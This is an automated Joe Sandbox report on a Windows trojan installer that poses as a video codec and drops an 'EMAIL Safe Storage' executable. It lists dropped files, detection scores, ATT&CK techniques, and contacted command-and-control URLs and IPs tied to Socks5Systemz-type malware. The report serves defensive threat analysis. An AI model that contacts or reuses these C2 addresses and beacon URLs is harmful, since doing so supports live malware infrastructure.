        Obfuscated Files or Information        		LSASS Memory1
        Account Discovery        		Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Bootkit        		1
        Access Token Manipulation        		21
        Software Packing        		Security Account Manager2
        File and Directory Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
        Windows Service        		1
        Timestomp        		NTDS35
        System Information Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
        Process Injection        		1
        DLL Side-Loading        		LSA Secrets41
        Security Software Discovery        		SSHKeylogging112
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading        		Cached Domain Credentials1
        Process Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
        Virtualization/Sandbox Evasion        		DCSync21
        Virtualization/Sandbox Evasion        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation        		Proc Filesystem11
        Application Window Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
        Process Injection        		/etc/passwd and /etc/shadow3
        System Owner/User Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Bootkit        		Network Sniffing1
        Remote System Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        System Network Configuration Discovery        		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        L9rm7AX4mp.exe24%ReversingLabsWin32.Trojan.Munp

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\ProgramData\EMAIL Safe Storage 10.2.46\EMAIL Safe Storage 10.2.46.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_RegDLL.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_iscrypt.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_isdecmp.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_setup64.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_shfoldr.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp4%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-2DT7G.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-2TIQ1.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-4BT74.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-4GU98.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-4L8QF.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-4PKG7.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-4SCDL.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-61SBR.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-65SGC.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-6DO3I.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-6S03E.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-7G2MG.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-9G1LK.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-BA0AN.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-D169I.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-FGQU3.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-FLD95.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-G59D3.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-H2J0H.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-I8TQ0.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-ILE5I.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-JTN8Q.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-MI7QU.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-MJPNF.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-MMD8V.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-MOHPK.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-MVKEA.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-O9QDL.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-OCNI8.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-OMDJC.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-PM61J.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-QACPG.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-S5KF0.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\is-TNU6F.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libfreetype-6.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgcc_s_dw2-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgdk-win32-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgdk_pixbuf-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgdkmm-2.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgio-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgiomm-2.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libglib-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libglibmm-2.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgmodule-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgobject-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgomp-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgraphite2.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libharfbuzz-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libiconv-2.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libintl-8.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libjpeg-8.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\liblcms2-2.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\liblzma-5.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpango-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpangocairo-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpangoft2-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpangomm-1.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpangowin32-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpcre-1.dll (copy)0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        signup.live.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.innosetup.com/0%URL Reputationsafe
        http://www.remobjects.com/ps0%URL Reputationsafe
        http://www.freedesktop.org/standards/desktop-bookmarks0%VirustotalBrowse
        http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD0%VirustotalBrowse
        http://purl.oclc.org/dsdl/schematron0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ezebtfp.ua
        		185.208.158.248
        		truetrue
          		unknown
          signup.live.com
          		unknown
          		unknownfalseunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://ezebtfp.ua/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396087fc16c6ef91true
            		unknown
            ezebtfp.uatrue
              		unknown
              http://ezebtfp.ua/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6btrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.innosetup.com/L9rm7AX4mp.tmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.drfalse
                • URL Reputation: safe
                		unknown
                http://185.208.158.248/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c8zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3289222096.0000000003509000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://freedesktop.orgtypenameexeccounttimestampparse_data-is-TNU6F.tmp.1.drfalse
                    		unknown
                    http://WWW-Authenticate:Proxy-Authenticate:Content-Encoding:gzip1.2.8Content-Length:-/recvis-FGQU3.tmp.1.drfalse
                      		unknown
                      http://185.258.2zextervideocodec32_64.exe, 00000003.00000002.3289384542.00000000035BB000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://www.freedesktop.org/standards/desktop-bookmarksis-TNU6F.tmp.1.drfalseunknown
                        http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtdis-FGQU3.tmp.1.drfalse
                          		unknown
                          http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTDis-FGQU3.tmp.1.drfalseunknown
                          http://purl.oclc.org/dsdl/schematronis-FGQU3.tmp.1.drfalseunknown
                          http://gcc.gnu.org/bugs.html):is-9G1LK.tmp.1.drfalse
                            		unknown
                            http://relaxng.org/ns/structure/1.0definenameincludegrammarxmlRelaxNGParse:is-FGQU3.tmp.1.drfalse
                              		unknown
                              http://www.ascc.net/xml/schematronis-FGQU3.tmp.1.drfalse
                                		unknown
                                http://www.freedesktop.org/standards/dbus/1.0/introspect.dtdis-2DT7G.tmp.1.drfalse
                                  		unknown
                                  http://185.208.158.248/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82dzextervideocodec32_64.exe, 00000003.00000002.3288010011.0000000000881000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3289222096.00000000034F0000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000008BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://tukaani.org/is-4BT74.tmp.1.drfalse
                                      		unknown
                                      http://www.remobjects.com/psUL9rm7AX4mp.exe, 00000000.00000003.2037781035.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2037603002.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.drfalse
                                        		unknown
                                        http://tukaani.org/xz/is-4BT74.tmp.1.drfalse
                                          		unknown
                                          http://mingw-w64.sourceforge.net/Xis-61SBR.tmp.1.drfalse
                                            		unknown
                                            http://www.freedesktop.org/standards/shared-mime-infois-TNU6F.tmp.1.drfalse
                                              		unknown
                                              http://185.2zextervideocodec32_64.exe, 00000003.00000002.3289384542.00000000035BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.freedesktop.org/standards/desktop-bookmarksapplicationgroupapplicationsgroupsprivateiconhis-TNU6F.tmp.1.drfalse
                                                  		unknown
                                                  http://relaxng.org/ns/structure/1.0is-FGQU3.tmp.1.drfalse
                                                    		unknown
                                                    http://www.remobjects.com/psL9rm7AX4mp.exe, 00000000.00000003.2037781035.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2037603002.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://fsf.org/L9rm7AX4mp.exe, 00000000.00000002.3287835540.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2036923371.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039536568.0000000002090000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3288142332.0000000002084000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.000000000085B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://freedesktop.orgis-TNU6F.tmp.1.drfalse
                                                        		unknown
                                                        http://purl.oclc.org/dsdl/schematronpathhttp://www.ascc.net/xml/schematron:nodeis-FGQU3.tmp.1.drfalse
                                                          		unknown
                                                          http://www.gnu.org/licenses/L9rm7AX4mp.exe, 00000000.00000002.3287835540.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2036923371.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039536568.0000000002090000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3288142332.0000000002084000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.000000000085B000.00000004.00000020.00020000.00000000.sdmp, is-K2QCH.tmp.1.dr, is-LP383.tmp.1.drfalse
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            185.208.158.248
                                                            		ezebtfp.uaSwitzerland
                                                            		34888SIMPLECARRER2ITtrue
                                                            89.105.201.183
                                                            		unknownNetherlands
                                                            		24875NOVOSERVE-ASNLfalse

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1524739
                                                            Start date and time:2024-10-03 08:38:11 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 31s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:6
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:L9rm7AX4mp.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:0396163369529cd5b010e3c35a2066c5.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@5/154@3/2
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 91%
                                                            • Number of executed functions: 196
                                                            • Number of non-executed functions: 245
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.42.22
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, l-0013.l-msedge.net, ctldl.windowsupdate.com, account.msa.msidentity.com, account.msa.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            02:39:38API Interceptor451715x Sleep call for process: zextervideocodec32_64.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            185.208.158.248noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                              noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                                  file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                                                    SecuriteInfo.com.Trojan.Win32.Crypt.31282.17969.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      SecuriteInfo.com.Gen.Heur.Munp.1.15479.6612.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        file.exeGet hashmaliciousClipboard Hijacker, Cryptbot, Neoreklami, Socks5SystemzBrowse
                                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            boSodF2WmT.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                89.105.201.183cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 200

                                                                                Domains

                                                                                No context

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                NOVOSERVE-ASNLnoode.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 89.105.201.183
                                                                                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                                                • 89.105.201.183
                                                                                SecuriteInfo.com.Gen.Heur.Munp.1.20199.21407.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 89.105.201.183
                                                                                SecuriteInfo.com.Gen.Heur.Munp.1.15479.6612.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 89.105.201.183
                                                                                file.exeGet hashmaliciousClipboard Hijacker, Cryptbot, Neoreklami, Socks5SystemzBrowse
                                                                                • 89.105.201.183
                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 89.105.201.183
                                                                                boSodF2WmT.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 89.105.201.183
                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 89.105.201.183
                                                                                mfRfEQGtYF.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 89.105.201.183
                                                                                oFzEHfD9N6.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 89.105.201.183
                                                                                SIMPLECARRER2ITnoode.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 185.208.158.248
                                                                                http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                • 185.208.158.9
                                                                                noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 185.208.158.248
                                                                                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                                                • 185.208.158.248
                                                                                file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                                                                • 185.208.158.248
                                                                                SecuriteInfo.com.Trojan.Win32.Crypt.31282.17969.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 185.208.158.248
                                                                                SecuriteInfo.com.Gen.Heur.Munp.1.11072.7602.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 185.196.8.214
                                                                                SecuriteInfo.com.Gen.Heur.Munp.1.20199.21407.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 185.196.8.214
                                                                                SecuriteInfo.com.Gen.Heur.Munp.1.15479.6612.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                • 185.208.158.248
                                                                                http://www.jp-area.com/beppu/rank.cgi?mode=link&id=218&url=https://0oenqK.startprogrammingnowbook.comGet hashmaliciousHTMLPhisherBrowse
                                                                                • 185.208.158.9

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_RegDLL.tmpnoode.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                    noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                      file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                                                        AX3-GUI-45.exeGet hashmaliciousUnknownBrowse
                                                                                          file.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                            AX3-GUI-45.exeGet hashmaliciousUnknownBrowse
                                                                                              qgdf1HLJno.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse

                                                                                                    Created / dropped Files

                                                                                                    C:\ProgramData\EMAIL Safe Storage 10.2.46\EMAIL Safe Storage 10.2.46.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2586624
                                                                                                    Entropy (8bit):6.983193640665711
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:v7mmNpaKaPVVldZRknn2/vg3FYPpWfidqm6tWz28g:v7mpKgNdZRknYg3Fo8OqmUWz28g
                                                                                                    MD5:4AC9B0BE70B6E01BFD47FFA47289DED7
                                                                                                    SHA1:A8E99F68A9DEA6F3C0A0767C4341716236D366E9
                                                                                                    SHA-256:A241C183E38754017F08936A0C6E71588EACAFC44C656110C071032F5B6FD159
                                                                                                    SHA-512:BA22F267944CB8FCB8729E99E62DB7EF27EAF38C2C613CD6C4106250EAABEC4546B387F465330410B006535B4DD9226FBDA12C22D6EC29795FC296C82E9C52A8
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Reputation:low
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...`W.L..................".........(."......."...@...........................'......3(......................................."......p#..`............................................................................"..............................text.....".......".................`....rdata........".......".............@..@.data...8d....#..0....".............@....rsrc....b...p#..b....#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\em102it46.dat

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    File Type:ISO-8859 text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8
                                                                                                    Entropy (8bit):2.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:X/:v
                                                                                                    MD5:2F06210C13337BAED2500CE4A8F0ADB2
                                                                                                    SHA1:E8A26D66FBA435248B76BFFE5D15F31550A95D78
                                                                                                    SHA-256:86A48BA39C30FF0A4AE4463C76215FAD84D1DBDDAE619A9D3B70D28015807FF1
                                                                                                    SHA-512:711D3AD2E4BEE488DB0F37133CAC09D248E896A0A68D9079857220CAE6A5FDC360129C2E6ECD780701117A7259514CBFEC781E2E7F9072CC96B8ED83EA7F5E42
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:D<.f....

                                                                                                    C:\ProgramData\em102rc46.dat

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):0.8112781244591328
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:q:q
                                                                                                    MD5:14CB44A8EE0BB0AA43F9C59CEDBEFA31
                                                                                                    SHA1:E5132D2015F3F9DBB4EC2449BAC2514B9FE5FFE8
                                                                                                    SHA-256:2EA111B9F81F7210FEFEA434E9A0BA054543754D83CE8368156138F22EB36134
                                                                                                    SHA-512:3DC09D5FAFA204053F2D2B7F6D6008B614A08EBD5D8488E948906B9CC7620773F661D899B8C8D94022CEF6C6599D80457A3F6E2317DEC6E18A9ED579C23BA6E9
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:[...

                                                                                                    C:\ProgramData\em102resa.dat

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128
                                                                                                    Entropy (8bit):2.9545817380615236
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                                    MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                                    SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                                    SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                                    SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

                                                                                                    C:\ProgramData\em102resb.dat

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128
                                                                                                    Entropy (8bit):1.7095628900165245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                                                    MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                                                    SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
